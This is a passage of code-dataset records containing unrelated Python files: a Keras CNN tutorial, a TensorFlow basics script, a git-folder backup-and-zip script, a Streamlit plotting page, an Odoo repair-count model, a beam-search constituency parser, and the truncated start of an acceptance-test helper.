left')\n\n plt.subplots_adjust(top=3)\n plt.show()\n\nprint('Done!')\n\n\"\"\"Now we are ready to design our model architecture.\n\nThe architecture comprises **three CONV layers** with **RELU activation functions**, each followed by **Max Pooling** layers. At the end, there is a **fully-connected** classifier that will classify the input into one of 10 outputs, using **cross entropy** as the loss function:\n\"\"\"\n\n# This function defines our neural network:\ndef create_model():\n\n model = Sequential()\n\n # The first conv layer with 32 kernels of 3*3 receiving an input of 32*32*3:\n model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same', input_shape=(32, 32, 3)))\n\n # Max pooling layer with a kernel of 2*2 and a stride of 2:\n model.add(MaxPooling2D((2, 2)))\n\n # Conv layer with 64 kernels of 3*3:\n model.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\n # Max pooling layer with a kernel of 2*2 and a stride of 2:\n model.add(MaxPooling2D((2, 2)))\n\n # Conv layer with 128 kernels of 3*3:\n model.add(Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\n # Max pooling layer with a kernel of 2*2 and a stride of 2:\n model.add(MaxPooling2D((2, 2)))\n\n # The feature maps are flattened at this point to be passed into fully-connected layers:\n model.add(Flatten())\n\n # Fully-connected layers leading to 10 classes with a softmax activation function:\n model.add(Dense(128, activation='relu', kernel_initializer='he_uniform'))\n model.add(Dense(10, activation='softmax'))\n\n # The optimiser is stochastic gradient descent with a learning rate of f 0.001 and a momentum of 0.9:\n optim = SGD(lr=0.001, momentum=0.9)\n\n # The model optimises cross entropy as its loss function and will monitor classification accuracy:\n model.compile(optimizer=optim, loss='categorical_crossentropy', metrics=['accuracy'])\n\n # Printing model summary:\n print(model.summary())\n\n return model\n\nprint('Done!')\n\n\"\"\"Now that all preparations are made and the model has been designed, it is time to start training the model.\n\nFirst, let's load the dataset:\n\"\"\"\n\ntrainX, trainY, testX, testY = load_data()\n\n\"\"\"Now, we pre-process the images using the function we defined earlier:\"\"\"\n\ntrainX, testX = pre_process_data(trainX, testX)\n\n\"\"\"Let's create the model:\"\"\"\n\nmodel = create_model()\n\n\"\"\"The model can now be trained for 20 epochs with a batch size of 64:\"\"\"\n\nhistory = model.fit(trainX, trainY, epochs=20, batch_size=64, validation_data=(testX, testY))\nprint('Done!')\n\n\"\"\"After the training is complete, we can evaluate the model on the test set and obtain the final accuracy level:\"\"\"\n\n_, acc = model.evaluate(testX, testY, verbose=1)\nprint('Accuracy: %.3f' % (acc * 100.0))\n\n\"\"\"We can plot the loss and accuracy curves to better analyse the training process.\n\nThe **blue** curves indicate performance over the **training data** and the *red* curves represent model performance over the *test data*:\n\"\"\"\n\nplot_curves(history)","repo_name":"atapour/keras-dl-examples","sub_path":"simple-cnn/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":7367,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"22030091439","text":"from __future__ import print_function\nimport tensorflow as tf\nimport os\nimport numpy as np\n\n\ntf.flags.DEFINE_string(\n 'log_dir', 
os.path.dirname(os.path.abspath(__file__)) + '/logs',\n 'Directory where event logs are written to.')\n\nFLAGS = tf.flags.FLAGS\n\n\nif not os.path.isabs(os.path.expanduser(FLAGS.log_dir)):\n raise ValueError('You must assign absolute path for --log_dir')\n'''----------------------------------------------------------------------------------'''\n\n# tf.constant\n# 定义一些常量\na = tf.constant(5, name=\"a\")\nb = tf.constant(10, name=\"b\")\ntensor_a = 5*tf.ones([5, 5])\ntensor_b = 3*tf.ones([5, 5])\n\n# 一些基本的运算\nx = tf.add(a, b, name=\"add\")\ny = tf.div(a, b, name=\"divide\")\n\n'''----------------------------------------------------------------------------------'''\n\n# Run the session\nwith tf.Session() as sess:\n writer = tf.summary.FileWriter(os.path.expanduser(FLAGS.log_dir), sess.graph)\n print(\"a =\", sess.run(a))\n print(\"b =\", sess.run(b))\n print(\"a + b =\", sess.run(x))\n print(\"a/b =\", sess.run(y))\n\n# Closing the writer.\nwriter.close()\nsess.close()\n\n","repo_name":"AtticusJohnson/TensorFlowLearning","sub_path":"PracticeCode/Tensorflow-Course/1-basic_math_operation.py","file_name":"1-basic_math_operation.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"69969433290","text":"import os\r\nimport time\r\nimport zipfile\r\n\r\nworkSpace = \"/Users/alphahinex/workspace\"\r\nbackupRoot = \"/Users/alphahinex/github/trunk/gitbackup/backup\"\r\nweek = time.strftime(\"%w\")\r\nbackupPath = os.path.join(backupRoot, week)\r\n\r\n# clean zip file which is a week ago\r\ndelCommand = \"rm -f \" + os.path.join(backupRoot,week + \".zip\")\r\nos.system(delCommand)\r\n\r\n# get all .git root path\r\nfirstLvs = os.listdir(workSpace)\r\nsrcDirs = []\r\nfor firstdir in firstLvs:\r\n if(os.path.isdir(os.path.join(workSpace,firstdir))):\r\n for secdir in os.listdir(os.path.join(workSpace,firstdir)):\r\n if(secdir.find('git')>0):\r\n if(os.path.isdir(os.path.join(workSpace,firstdir,secdir))):\r\n srcDirs.append(firstdir)\r\n\r\n# copy .git folder\r\nfor folder in srcDirs:\r\n copyCommand = \"mkdir -p \" + os.path.join(backupPath, folder) + \" && \"\r\n copyCommand += \"cp -R \" + os.path.join(workSpace,folder,\".git\") + \" \" + os.path.join(backupPath,folder,\".git\")\r\n os.system(copyCommand)\r\n\r\n# zip the backup folder\r\nfilelist = []\r\nfor root, dirs, files in os.walk(backupPath):\r\n for name in files:\r\n filelist.append(os.path.join(root,name))\r\n\r\nzf = zipfile.ZipFile(os.path.join(backupRoot,week+\".zip\"),\"w\",zipfile.zlib.DEFLATED)\r\nfor fileToZip in filelist:\r\n zf.write(fileToZip)\r\nzf.close()\r\n\r\n# clean temp folder\r\nrdCommand = \"rm -rf \" + backupPath\r\nos.system(rdCommand)","repo_name":"AlphaHinex/trunk","sub_path":"gitbackup/backupgit_unix_py2_v1.py","file_name":"backupgit_unix_py2_v1.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39262820460","text":"import streamlit as st\nimport io\nimport pandas as pd\nimport numpy as np\nfrom custom_download_button import download_button\nfrom inference_utils.plots_for_space import PlotPCA_CLSProjection, PlotUMAP_CLSProjection, PlotPaCMAP_CLSProjection\n\n\neffectordering = {\n 'EC50_algae': {'POP':'POP'},\n 'EC10_algae': {'POP':'POP'},\n 'EC50EC10_algae': {'POP':'POP'}, \n 'EC50_invertebrates': {'MOR':'MOR','ITX':'ITX'},\n 'EC10_invertebrates': {'MOR':'MOR','DVP':'DVP','ITX':'ITX', 'REP': 'REP', 'MPH': 'MPH', 
'POP': 'POP'} ,\n 'EC50EC10_invertebrates': {'MOR':'MOR','DVP':'DVP','ITX':'ITX', 'REP': 'REP', 'MPH': 'MPH', 'POP': 'POP'} ,\n 'EC50_fish': {'MOR':'MOR'},\n 'EC10_fish': {'MOR':'MOR','DVP':'DVP','ITX':'ITX', 'REP': 'REP', 'MPH': 'MPH', 'POP': 'POP','GRO': 'GRO'} ,\n 'EC50EC10_fish': {'MOR':'MOR','DVP':'DVP','ITX':'ITX', 'REP': 'REP', 'MPH': 'MPH', 'POP': 'POP','GRO': 'GRO'} \n }\n\nendpointordering = {\n 'EC50_algae': {'EC50':'EC50'},\n 'EC10_algae': {'EC10':'EC10'},\n 'EC50EC10_algae': {'EC50':'EC50', 'EC10': 'EC10'}, \n 'EC50_invertebrates': {'EC50':'EC50'},\n 'EC10_invertebrates': {'EC10':'EC10'},\n 'EC50EC10_invertebrates': {'EC50':'EC50', 'EC10': 'EC10'},\n 'EC50_fish': {'EC50':'EC50'},\n 'EC10_fish': {'EC10':'EC10'},\n 'EC50EC10_fish': {'EC50':'EC50', 'EC10': 'EC10'} \n }\n\ndef print_space_page():\n col1, col2 = st.columns((1,3))\n with col1:\n st.markdown('## Projection metrics')\n projection = st.selectbox('Projection method', ('PCA','UMAP'))\n species_group = {'fish': 'fish', 'aquatic invertebrates': 'invertebrates', 'algae': 'algae'}\n model_type = {'Combined model (best performance)': 'EC50EC10'}\n \n PREDICTION_SPECIES = species_group[st.radio(\"Select Species group\", tuple(species_group.keys()), on_change=None, help=\"Don't know which to use? \\n Check the `Species groups` section under `Documentation`\")]\n MODELTYPE = model_type[st.radio(\"Select Model type\", tuple(model_type), on_change=None, help=\"Don't know which to use?\\n Check the `Models` section under `Documentation`\")]\n endpoints = endpointordering[f'{MODELTYPE}_{PREDICTION_SPECIES}']\n effects = effectordering[f'{MODELTYPE}_{PREDICTION_SPECIES}']\n PREDICTION_ENDPOINT = endpoints[st.radio(\"Select Endpoint \",tuple(endpoints.keys()), on_change=None, help=\"Don't know which to use?\\n Check the `Endpoints` section under `Documentation`\")]\n PREDICTION_EFFECT = effects[st.radio(\"Select Effect \",tuple(effects.keys()), on_change=None, help=\"Don't know which to use?\\n Check the `Effects` section under `Documentation`\")]\n \n PREDICTION_EXTENDED_DATA = st.checkbox('show predictions outside training data')\n if projection == 'UMAP':\n MIN_DISTNACE = st.number_input('min distance')\n N_NEIGHBORS = st.number_input('n neighbors')\n\n run_prediction = st.button('Predict')\n \n with col2:\n if run_prediction:\n with st.spinner(text = 'Inference in Progress...'):\n if projection == 'PCA':\n fig = PlotPCA_CLSProjection(model_type=MODELTYPE, endpoint=PREDICTION_ENDPOINT, effect=PREDICTION_EFFECT, species_group=PREDICTION_SPECIES, show_all_predictions=PREDICTION_EXTENDED_DATA, inference_df=None)\n st.plotly_chart(fig, use_container_width=True, theme='streamlit')\n \n if projection == 'UMAP':\n fig = PlotUMAP_CLSProjection(model_type=MODELTYPE, endpoint=PREDICTION_ENDPOINT, effect=PREDICTION_EFFECT, species_group=PREDICTION_SPECIES, show_all_predictions=PREDICTION_EXTENDED_DATA, inference_df=None, n_neighbors=N_NEIGHBORS, min_dist=MIN_DISTNACE)\n st.plotly_chart(fig, use_container_width=True, theme='streamlit')\n \n if projection == 'PaCMAP':\n fig = PlotPaCMAP_CLSProjection(model_type=MODELTYPE, endpoint=PREDICTION_ENDPOINT, effect=PREDICTION_EFFECT, species_group=PREDICTION_SPECIES, show_all_predictions=PREDICTION_EXTENDED_DATA, inference_df=None)\n st.plotly_chart(fig, use_container_width=True, theme='streamlit')\n\n buffer = io.StringIO()\n fig.write_html(buffer, include_plotlyjs='cdn')\n html_bytes = buffer.getvalue().encode()\n\n download_button_str = download_button(html_bytes, 'interactive_CLS_projection.html', 
'Lagging ➡ Download HTML', pickle_it=False)\n st.markdown(download_button_str, unsafe_allow_html=True)\n","repo_name":"StyrbjornKall/TRIDENT_application","sub_path":"space_page.py","file_name":"space_page.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7101812703","text":"from collections import defaultdict\n\nfrom odoo import _, fields, models\n\n\nclass ProductProduct(models.Model):\n _inherit = \"product.product\"\n\n repair_count = fields.Float(\n compute_sudo=True,\n compute=\"_compute_repair\",\n string=\"Repairs\",\n help=\"Number of Repair Orders where the product appears as a Part\",\n )\n in_repair_ids = fields.Many2many(\n comodel_name=\"repair.order\", compute=\"_compute_repair\", store=True\n )\n\n def _compute_repair(self):\n self.repair_count = 0\n product_rma_dict = defaultdict(list)\n [\n product_rma_dict[operation.product_id.id].append(operation.repair_id.id)\n for operation in self.env[\"repair.line\"].search(\n [\n (\"company_id\", \"in\", self.env.company.ids),\n (\"product_id\", \"in\", self.ids),\n ]\n )\n ]\n for product in self:\n if not product.id:\n product.repair_count = 0.0\n continue\n product.in_repair_ids = product_rma_dict.get(product.id, [])\n product.repair_count = len(\n product.in_repair_ids.filtered(\n lambda x: x.state not in (\"draft\", \"cancel\")\n )\n )\n\n def action_product_product_in_rma_list(self):\n domain = [\n (\"id\", \"in\", self.in_repair_ids.ids),\n ]\n context = {\n \"search_default_not_draft\": 1,\n }\n\n action = {\n \"name\": _(\"Repair Orders\"),\n \"type\": \"ir.actions.act_window\",\n \"res_model\": \"repair.order\",\n \"view_type\": \"list\",\n \"view_mode\": \"list,form\",\n \"domain\": domain,\n \"context\": context,\n }\n return action\n","repo_name":"oxigensalud/odoo-addons","sub_path":"oxigen_repair/models/product_product.py","file_name":"product_product.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"5644295379","text":"#! /usr/bin/env python\nfrom SparseWeightVector import SparseWeightVector\n\n\"\"\"\nTransition based const. 
parser (includes tagging)\nScored with beam search and perceptron.\n\"\"\"\n\nclass ConsTree:\n\n def __init__(self,label,children=None):\n self.label = label\n self.children = [] if children is None else children\n\n def is_leaf(self):\n return self.children == []\n \n def add_child(self,child_node):\n self.children.append(child_node)\n \n def arity(self):\n return len(self.children)\n \n def get_child(self,idx=0):\n \"\"\"\n returns the ith child of this node\n \"\"\"\n return self.children[idx]\n\n def __str__(self):\n \"\"\"\n pretty prints the tree\n \"\"\"\n return self.label if self.is_leaf() else '(%s %s)'%(self.label,' '.join([str(child) for child in self.children]))\n\n def tokens(self,labels=True):\n \"\"\"\n @param labels: returns a list of strings if true else returns\n a list of ConsTree objects\n @return the list of words at the leaves of the tree\n \"\"\"\n if self.is_leaf():\n return [self.label] if labels else [self]\n else:\n result = []\n for child in self.children:\n result.extend(child.tokens(labels))\n return result\n \n def index_leaves(self):\n \"\"\"\n Adds an numeric index to each leaf node\n \"\"\"\n for idx,elt in enumerate(self.tokens(labels=False)):\n elt.idx = idx\n \n def triples(self):\n \"\"\"\n Extracts a list of evalb triples from the tree\n (supposes leaves are indexed)\n \"\"\"\n if self.is_leaf():\n return [(self.idx,self.idx+1,self.label)]\n else:\n subtriples = []\n for child in self.children:\n subtriples.extend(child.triples())\n leftidx = min([idx for idx,jdx,label in subtriples])\n rightidx = max([jdx for idx,jdx,label in subtriples])\n subtriples.append((leftidx,rightidx,self.label))\n return subtriples\n\n def compare(self,other):\n \"\"\"\n Compares this tree to another and computes precision,recall,\n fscore. 
Assumes self is the reference tree\n @param other: the predicted tree\n @return (precision,recall,fscore)\n \"\"\"\n self.index_leaves()\n other.index_leaves()\n ref_triples = set(self.triples())\n pred_triples = set(other.triples())\n intersect = ref_triples.intersection(pred_triples)\n isize = len(intersect)\n P = isize/len(pred_triples)\n R = isize/len(ref_triples)\n F = (2*P*R)/(P+R)\n return (P,R,F)\n\n \n def close_unaries(self,dummy_annotation='$'):\n \"\"\"\n In place (destructive) unary closure of unary branches\n \"\"\"\n if self.arity() == 1:\n current = self\n unary_labels = []\n while current.arity() == 1 and not current.get_child().is_leaf():\n unary_labels.append(current.label)\n current = current.get_child()\n unary_labels.append(current.label)\n self.label = dummy_annotation.join(unary_labels)\n self.children = current.children\n \n for child in self.children:\n child.close_unaries()\n\n def expand_unaries(self,dummy_annotation='$'):\n \"\"\"\n In place (destructive) expansion of unary symbols.\n \"\"\"\n if dummy_annotation in self.label:\n unary_chain = self.label.split(dummy_annotation)\n self.label = unary_chain[0]\n backup = self.children\n current = self\n for label in unary_chain[1:]:\n c = ConsTree(label)\n current.children = [c] \n current = c\n current.children = backup\n \n for child in self.children:\n child.expand_unaries()\n\n \n def left_markovize(self,dummy_annotation=':'):\n \"\"\"\n In place (destructive) left markovization (order 0)\n \"\"\"\n if len(self.children) > 2:\n left_sequence = self.children[:-1]\n dummy_label = self.label if self.label[-1] == dummy_annotation else self.label+dummy_annotation\n dummy_tree = ConsTree(dummy_label, left_sequence)\n self.children = [dummy_tree,self.children[-1]]\n for child in self.children:\n child.left_markovize()\n\n def right_markovize(self,dummy_annotation=':'):\n \"\"\"\n In place (destructive) right markovization (order 0)\n \"\"\"\n if len(self.children) > 2:\n right_sequence = self.children[1:]\n dummy_label = self.label if self.label[-1] == dummy_annotation else self.label+dummy_annotation\n dummy_tree = ConsTree(dummy_label, right_sequence)\n self.children = [self.children[0],dummy_tree]\n for child in self.children:\n child.right_markovize()\n\n def unbinarize(self,dummy_annotation=':'):\n \"\"\"\n In place (destructive) unbinarization\n \"\"\"\n newchildren = []\n for child in self.children:\n if child.label[-1] == dummy_annotation:\n child.unbinarize()\n newchildren.extend(child.children)\n else:\n child.unbinarize()\n newchildren.append(child)\n self.children = newchildren\n\n def collect_nonterminals(self):\n \"\"\"\n Returns the list of nonterminals found in a tree:\n \"\"\"\n if not self.is_leaf():\n result = [self.label]\n for child in self.children:\n result.extend(child.collect_nonterminals())\n return result\n return []\n\n @staticmethod\n def read_tree(input_str):\n \"\"\"\n Reads a one line s-expression.\n This is a non robust function to syntax errors\n @param input_str: a s-expr string\n @return a ConsTree object\n \"\"\"\n tokens = input_str.replace('(',' ( ').replace(')',' ) ').split()\n stack = [ConsTree('dummy')]\n for idx,tok in enumerate(tokens):\n if tok == '(':\n current = ConsTree(tokens[idx+1])\n stack[-1].add_child(current)\n stack.append(current)\n elif tok == ')':\n stack.pop()\n else:\n if tokens[idx-1] != '(':\n stack[-1].add_child(ConsTree(tok))\n assert(len(stack) == 1)\n return stack[-1].get_child()\n\n\nclass ConstituentTransitionParser:\n\n SHIFT = \"S\"\n REDUCE = 
\"R\"\n STOP = \"!\"\n \n def __init__(self):\n self.model = SparseWeightVector()\n self.nonterminals = []\n\n def static_oracle(self,stack,buffer,ref_triples):\n \"\"\"\n Returns the action to do given a configuration and a ref parse tree\n @param ref_triples : the triples from the reference tree\n @param stack: the config stack\n @param buffer: a list of integers\n @return a couple (parse action, action param)\n \"\"\"\n if len(stack) >= 2:\n (i,k,X1),(k,j,X2) = stack[-2],stack[-1]\n for X in self.nonterminals:\n if (i,j,X) in ref_triples:\n return (ConstituentTransitionParser.REDUCE,X)\n if buffer:\n idx = buffer[0]\n for tag in self.nonterminals:\n if(idx,idx+1,tag) in ref_triples:\n return (ConstituentTransitionParser.SHIFT,tag)\n return (ConstituentTransitionParser.STOP,ConstituentTransitionParser.STOP)\n\n \n def reference_derivation(self,ref_tree):\n \"\"\"\n Returns a reference derivation given a reference tree\n @param ref_tree: a ConsTree\n \"\"\"\n ref_tree.index_leaves()\n ref_triples = set(ref_tree.triples())\n sentence = ref_tree.tokens()\n N = len(sentence)\n\n action = (None,None)\n c = (tuple(),tuple(range(N)),0.0)\n derivation = [(action,c)]\n \n for t in range(2*N):#because 2N-1+terminate\n S,B,score = c\n action,param = self.static_oracle(S,B,ref_triples)\n if action == ConstituentTransitionParser.REDUCE:\n c = self.reduce(c,param,sentence)\n elif action == ConstituentTransitionParser.SHIFT:\n c = self.shift(c,param,sentence)\n else:\n c = self.terminate(c,sentence)\n derivation.append(((action,param),c))\n return derivation\n\n\n def build_tree(self,derivation,sentence):\n \"\"\"\n Builds a ConsTree from a parse derivation\n @param derivation: a parse derivation\n @param sentence: a list of tokens\n @return a ConsTree\n \"\"\"\n tree_stack = [ ]\n for (action,param) , C in derivation:\n S,B,score = C \n if action == ConstituentTransitionParser.SHIFT:\n i,j,lbl = S[-1]\n tag_node = ConsTree(param)\n leaf_node = ConsTree(sentence[i])\n tag_node.add_child(leaf_node)\n tree_stack.append(tag_node)\n elif action == ConstituentTransitionParser.REDUCE:\n root_node = ConsTree(param)\n rnode = tree_stack.pop()\n lnode = tree_stack.pop()\n root_node.children = [lnode,rnode]\n tree_stack.append(root_node)\n return tree_stack[-1]\n \n def reduce(self,C,param,sentence):\n \"\"\"\n Performs a reduction from the current configuration and returns the result\n @param S: a stack\n @param B: a buffer\n @param param: the category for reduction\n @return a configuration\n \"\"\"\n S,B,score = C\n i,k,_ = S[-2]\n k,j,_ = S[-1]\n return (S[:-2]+((i,j,param),),B,score+self.score(C,(ConstituentTransitionParser.REDUCE,param),sentence))\n \n def shift(self,C,param,sentence):\n \"\"\"\n Performs a reduction from the current configuration and returns the result\n @param S: a stack\n @param B: a buffer\n @param param: the category for reduction\n @return a configuration\n \"\"\"\n S,B,score = C\n idx = S[-1][1] if S else 0\n return (S+((idx,idx+1,param),),B[1:],score+self.score(C,(ConstituentTransitionParser.SHIFT,param),sentence))\n \n def terminate(self,C,sentence):\n \"\"\"\n Performs a stop action returns the result\n \"\"\"\n S,B,score = C\n return (S,B,score+self.score(C,(ConstituentTransitionParser.STOP,ConstituentTransitionParser.STOP),sentence))\n \n\n def score(self,configuration,action,tokens):\n \"\"\"\n Computes the prefix score of a derivation\n @param configuration : a triple (S,B,score)\n @param action: an action label \n @param tokens: the x-sequence of tokens to be parsed\n 
@return a prefix score\n \"\"\"\n S,B,old_score = configuration\n config_repr = self.__make_config_representation(S,B,tokens)\n return old_score + self.model.dot(config_repr,action)\n\n def __make_config_representation(self,S,B,tokens):\n \"\"\"\n This gathers the information for coding the configuration as a feature vector.\n @param S: a configuration stack\n @param B a configuration buffer\n @return an ordered list of tuples \n \"\"\"\n #default values for inaccessible positions\n s0cat,s1cat,s0l,s0r,s1l,s1r,b0,b1,b2 = \"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\"\n \n if len(S) > 0:\n i,j,lbl = S[-1]\n s0l,s0r,s0cat = tokens[i],tokens[j-1],lbl\n if len(S) > 1:\n i,j,lbl = S[-2]\n s1l,s1r,s1cat = tokens[i],tokens[j-1],lbl\n if len(B) > 0:\n b0 = tokens[B[0]]\n if len(B) > 1:\n b1 = tokens[B[1]]\n if len(B) > 2:\n b2 = tokens[B[2]]\n\n wordlist = [s0l,s0r,s1l,s1r,b0,b1,b2]\n catlist = [s0cat,s1cat,b0]\n word_bigrams = list(zip(wordlist,wordlist[1:]))\n word_trigrams = list(zip(wordlist,wordlist[1:],wordlist[2:]))\n cat_bigrams = list(zip(catlist,catlist[1:]))\n \n return word_bigrams + word_trigrams + cat_bigrams\n\n\n def transform(self,dataset,left_markov = True):\n \"\"\"\n In place (destructive) conversion of a treebank to Chomsky Normal Form.\n Builds the list of the parser nonterminals as a side effect\n and indexes references trees.\n \n @param dataset a list of ConsTrees\n @param left_markov: if true -> left markovization else right markovization\n \"\"\"\n all_nonterminals = set()\n for tree in dataset:\n tree.close_unaries()\n if left_markov:\n tree.left_markovize()\n else:\n tree.right_markovize()\n all_nonterminals.update(tree.collect_nonterminals()) \n self.nonterminals = list(all_nonterminals)\n \n def parse_one(self,sentence,beam_size=4,get_beam=False,deriv=False,untransform=True):\n \"\"\"\n @param sentence: a list of strings\n @param beam_size: size of the beam\n @param get_beam : returns the beam instead of tree like structures\n @param deriv: returns the derivation instead of the parse tree\n @param untransform: bool if true unbinarizes the resulting tree.\n \"\"\"\n \n actions = [ConstituentTransitionParser.SHIFT,\\\n ConstituentTransitionParser.REDUCE,\\\n ConstituentTransitionParser.STOP]\n all_actions = list([(a,p) for a in actions for p in self.nonterminals])\n \n N = len(sentence)\n init = (tuple(),tuple(range(N)),0.0) #A config is a hashable triple with score \n current_beam = [(-1,(None,None),init)]\n beam = [current_beam]\n \n for i in range(2*N): #because 2*N-1+terminate\n next_beam = []\n for idx, ( _ ,action,config) in enumerate(current_beam):\n S,B,score = config \n for (a,p) in all_actions:\n if a == ConstituentTransitionParser.SHIFT:\n if B:\n newconfig = self.shift(config,p,sentence)\n next_beam.append((idx,(a,p),newconfig))\n elif a == ConstituentTransitionParser.REDUCE:\n if len(S) >= 2:\n newconfig = self.reduce(config,p,sentence)\n next_beam.append((idx,(a,p),newconfig))\n elif a == ConstituentTransitionParser.STOP:\n if len(S) < 2 and not B:\n newconfig = self.terminate(config,sentence)\n next_beam.append((idx,(a,a),newconfig))\n next_beam.sort(key=lambda x:x[2][2],reverse=True)\n next_beam = next_beam[:beam_size]\n beam.append(next_beam)\n current_beam = next_beam\n \n if get_beam:\n return beam\n else:\n #Backtrace for derivation\n idx = 1\n prev_jdx = 0\n derivation = []\n while prev_jdx != -1:\n current = beam[-idx][prev_jdx]\n prev_jdx,prev_action,C = current\n 
derivation.append((prev_action,C))\n idx += 1\n derivation.reverse()\n if deriv:\n return derivation\n else:\n result = self.build_tree(derivation,sentence)\n if untransform:\n result.unbinarize()\n result.expand_unaries()\n return result\n\n def early_prefix(self,ref_parse,beam):\n \"\"\"\n Finds the prefix for early update, that is the prefix where the ref parse fall off the beam.\n @param ref_parse: a parse derivation\n @param beam: a beam output by the parse_one function\n @return (bool, ref parse prefix, best in beam prefix)\n the bool is True if update required false otherwise\n \"\"\"\n idx = 0\n for (actionR,configR),(beamCol) in zip(ref_parse,beam):\n found = False\n for source_idx,action,configTarget in beamCol:\n if action == actionR and configTarget[:-1] == configR[:-1]: #-1 -> does not test score equality\n found = True\n break\n if not found:\n #backtrace\n jdx = idx\n source_idx = 0\n early_prefix = []\n while jdx >= 0:\n new_source_idx,action,config = beam[jdx][source_idx]\n early_prefix.append( (action,config))\n source_idx = new_source_idx\n jdx -= 1\n early_prefix.reverse()\n return (True, ref_parse[:idx+1],early_prefix)\n idx+=1\n #if no error found check that the best in beam is the ref parse\n last_ref_action,last_ref_config = ref_parse[-1]\n _,last_pred_action,last_pred_config = beam[-1][0]\n if last_pred_config[:-1] == last_ref_config[:-1]:\n return (False,None,None) #returns a no update message\n else:#backtrace\n jdx = len(beam)-1\n source_idx = 0\n early_prefix = []\n while jdx >= 0:\n new_source_idx,action,config = beam[jdx][source_idx]\n early_prefix.append( (action,config) )\n source_idx = new_source_idx\n jdx -= 1\n early_prefix.reverse()\n return (True,ref_parse,early_prefix)\n \n\n def test(self,treebank,beam_size=4):\n \"\"\" \n @param treebank a list of ConsTrees\n @param left_markov: if true -> left markovization else right markovization\n @return the avg f-score\n \"\"\"\n Fscores = []\n for tree in treebank:\n result = self. 
parse_one(tree.tokens(),beam_size)\n print(result)\n P,R,F = tree.compare(result)\n Fscores.append(F)\n return sum(Fscores)/len(Fscores)\n \n def train(self,treebank,step_size=1.0,max_epochs=100,beam_size=4,left_markov=True):\n \"\"\" \n @param treebank a list of ConsTrees\n @param left_markov: if true -> left markovization else right markovization\n \"\"\"\n self.transform(treebank,left_markov)\n dataset = list([(tree.tokens(),self.reference_derivation(tree)) for tree in treebank])\n N = len(dataset)\n for e in range(max_epochs):\n loss = 0.0\n for sentence,ref_derivation in dataset:\n pred_beam = (self.parse_one(sentence,get_beam=True))\n (update, ref_prefix,pred_prefix) = self.early_prefix(ref_derivation,pred_beam)\n if update:\n loss += 1.0\n delta_ref = SparseWeightVector()\n current_config = ref_prefix[0][1]\n for action,config in ref_prefix[1:]:\n S,B,score = current_config\n x_repr = self.__make_config_representation(S,B,sentence)\n delta_ref += SparseWeightVector.code_phi(x_repr,action)\n current_config = config\n \n delta_pred = SparseWeightVector()\n current_config = pred_prefix[0][1]\n for action,config in pred_prefix[1:]:\n S,B,score = current_config\n x_repr = self.__make_config_representation(S,B,sentence)\n delta_pred += SparseWeightVector.code_phi(x_repr,action)\n current_config = config\n\n self.model += step_size*(delta_ref-delta_pred)\n \n print('Loss = ',loss, \"%Exact match = \",(N-loss)/N)\n if loss == 0.0:\n return\n\n \n \nx = ConsTree.read_tree('(S (NP (D le) (N chat)) (VN (V mange)) (NP (D la) (N souris)) (PP (P sur) (NP (D le) (N paillasson))) (PONCT .))')\ny = ConsTree.read_tree('(S (NP (D la) (N souris)) (VN (V dort)) (PONCT .))')\nz = ConsTree.read_tree('(S (NP (D le) (N cuisinier)) (VN (V mange)) (NP (D une) (N salade) (PP (P avec) (NP (D des) (N cornichons)))) (PONCT .))')\n\nparser = ConstituentTransitionParser()\nparser.train([x,y,z])\n\nx = ConsTree.read_tree('(S (NP (D le) (N chat)) (VN (V mange)) (NP (D la) (N souris)) (PP (P sur) (NP (D le) (N paillasson))) (PONCT .))')\ny = ConsTree.read_tree('(S (NP (D la) (N souris)) (VN (V dort)) (PONCT .))')\nz = ConsTree.read_tree('(S (NP (D le) (N cuisinier)) (VN (V mange)) (NP (D une) (N salade) (PP (P avec) (NP (D des) (N cornichons)))) (PONCT .))')\n\n\nprint(parser.test([x,y,z]))\n","repo_name":"bencrabbe/parsing-at-diderot","sub_path":"const_transition.py","file_name":"const_transition.py","file_ext":"py","file_size_in_byte":21088,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"35485078512","text":"from datetime import datetime\nfrom functools import partial\nfrom typing import Mapping\n\nimport requests\n\nfrom acceptance_tests.utilities.pubsub_helper import get_matching_pubsub_message_acking_others\nfrom acceptance_tests.utilities.test_case_helper import test_helper\nfrom config import Config\n\n\ndef add_survey(sample_validation_rules, test_start_time, sample_definition_url=\"http://foo.bar.json\",\n sample_has_header_row=True, sample_file_separator=','):\n survey_name = 'test survey ' + datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")\n\n url = f'{Config.SUPPORT_TOOL_API}/surveys'\n\n body = {\"name\": survey_name,\n \"sampleValidationRules\": sample_validation_rules,\n \"sampleWithHeaderRow\": sample_has_header_row,\n \"sampleSeparator\": sample_file_separator,\n \"sampleDefinitionUrl\": sample_definition_url,\n \"metadata\": {'foo': 'bar'}}\n\n response = requests.post(url, json=body)\n response.raise_for_status()\n\n survey_id = 
